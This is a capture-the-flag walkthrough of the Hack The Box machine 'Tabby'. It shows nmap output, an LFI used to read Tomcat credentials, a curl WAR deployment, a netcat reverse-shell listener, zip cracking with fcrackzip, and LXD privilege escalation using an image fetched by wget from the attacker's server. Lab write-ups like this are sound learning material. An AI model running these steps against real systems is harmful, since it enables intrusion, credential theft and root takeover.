NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 22:45 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:45
Completed NSE at 22:45, 0.00s elapsed
Initiating NSE at 22:45
Completed NSE at 22:45, 0.00s elapsed
Initiating NSE at 22:45
Completed NSE at 22:45, 0.00s elapsed
Initiating Ping Scan at 22:45
Scanning 10.10.10.194 [4 ports]
Completed Ping Scan at 22:45, 0.56s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:45
Scanning tabby.htb (10.10.10.194) [1000 ports]
Discovered open port 22/tcp on 10.10.10.194
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Completed SYN Stealth Scan at 22:45, 2.73s elapsed (1000 total ports)
Initiating Service scan at 22:45
Scanning 3 services on tabby.htb (10.10.10.194)
Completed Service scan at 22:45, 7.34s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against tabby.htb (10.10.10.194)
Retrying OS detection (try #2) against tabby.htb (10.10.10.194)
Initiating Traceroute at 22:45
Completed Traceroute at 22:45, 6.34s elapsed
NSE: Script scanning 10.10.10.194.
Initiating NSE at 22:45
Completed NSE at 22:45, 8.54s elapsed
Initiating NSE at 22:45
Completed NSE at 22:46, 2.00s elapsed
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Nmap scan report for tabby.htb (10.10.10.194)
Host is up (0.42s latency).
Not shown: 802 closed ports, 195 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 21 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 995/tcp)
HOP RTT ADDRESS
1 ... 20
21 284.13 ms tabby.htb (10.10.10.194)
NSE: Script Post-scanning.
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.56 seconds
Raw packets sent: 1560 (72.546KB) | Rcvd: 837 (34.270KB)
WEBSITE ENUMEARTION
PORT 80
PORT 8080
running tomcate which need username password for manager but we didnt have one!!
So lets go for port 80 MEGA HOSTING part
After searching for its exploit I didnot get the actuall exploit but got idea that it has LFI
So here in news part it contains LFI
SO after trying log exploitation I got to know that we cannot have RCE
GETTING PASSWORDS FOR TOMCAT WEBSITE
Here we see that we have LFI from where we can get tomcat password!!
So here first we need to understand its directory structure
https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory
I recommend you to download tomcat to check its file structure
SO after going through that directory I got password for tomcat
So lets get our shell
which was not that easy as i have to google and took help from forums!!
because their is no upload area so we have to upload using curl and wget!!
So please do one thing Do read Documentaion of Apache Tomcat9 upload application part
curl -v -u tomcat:****************** -T test.war ‘http://10.10.10.194:8080/manager/text/deploy?path=/test&update=true’
Then we can access it using
http://tabby.htb:8080/manager/text/list
┌─[root@liquid]─[~/Desktop/HTB/tabby]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.194] 40170
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$
GETTING USER ACCESS
lets Download linpeas to our shell
After downloading it and running it in tmp directory we got a archive which is owned by ash which looks interesting
So lets get that to our local machine
┌─[root@liquid]─[~/Desktop/HTB/tabby]
└──╼ #ls
16162020_backup.zip liquid.war
So to unzip it we need password so lets crack it using fcrackzip
┌─[root@liquid]─[~/Desktop/HTB/tabby]
└──╼ #fcrackzip -D -p ../../THM/Wordlists/rockyou.txt 16162020_backup.zip
possible pw found: ******** ()
So after enumerating through files i got nothing so i used this password to SU ASH
Here we go with our user ash
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
GETTING ROOT ACCESS
So here we go with our usual command
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:~$ sudo -l
sudo: unable to open /run/sudo/ts/ash: Read-only file system
[sudo] password for ash:
Sorry, user ash may not run sudo on tabby.
ash@tabby:~$
but the thing is that LXD looks suspicious
So lets google it
Here we know that we could privesc using this
https://www.hackingarticles.in/lxd-privilege-escalation/
https://book.hacktricks.xyz/linux-unix/privilege-escalation/lxd-privilege-escalation
So just follow all these steps
But one thing which took me 3 hrs to find my mistake is do this from ash directory not from tmp
As it was not working for me from tmp So i tried for ash ones
FROM YOUR MACHINE
┌─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
└──╼ #ls -l
total 3180
-rw-r--r-- 1 root root 3212312 Jun 21 22:04 alpine-v3.12-x86_64-20200621_2204.tar.gz
-rwxr-xr-x 1 root root 7498 Jun 21 22:03 build-alpine
-rw-r--r-- 1 root root 26530 Jun 21 22:03 LICENSE
-rw-r--r-- 1 root root 768 Jun 21 22:03 README.md
┌─[✗]─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
└──╼ #python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
FROM ASH’S MACHINE
ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
<14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
--2020-06-21 17:20:54-- http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
Connecting to 10.10.14.12:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3212312 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’
alpine-v3.12-x86_64 100%[===================>] 3.06M 67.4KB/s in 45s
2020-06-21 17:21:39 (70.2 KB/s) - ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’ saved [3212312/3212312]
ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
<ne-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
ash@tabby:~$ lxc image list
lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| liquid | 1145f55bb6a7 | no | alpine v3.12 (20200621_22:04) | x86_64 | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
Here you may encounter with this error
Error: No storage pool found. Please create a new storage pool
ash@tabby:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: no
Would you like to connect to a MAAS server? (yes/no) [default=no]: ^C
ash@tabby:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
Name of the new storage pool [default=default]:
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
Would you like to connect to a MAAS server? (yes/no) [default=no]: no
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: liquid
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
THEN JUST GO FURTHER WITH YOUR COMMANDS :
ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
Creating privesc
ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to privesc
ash@tabby:~$ ^C
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root
/mnt/root # ls
bin home lost+found root swap.img
boot lib media run sys
cdrom lib32 mnt sbin tmp
dev lib64 opt snap usr
etc libx32 proc srv var
/mnt/root # cd root
/mnt/root/root # wc -c root.txt
33 root.txt
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
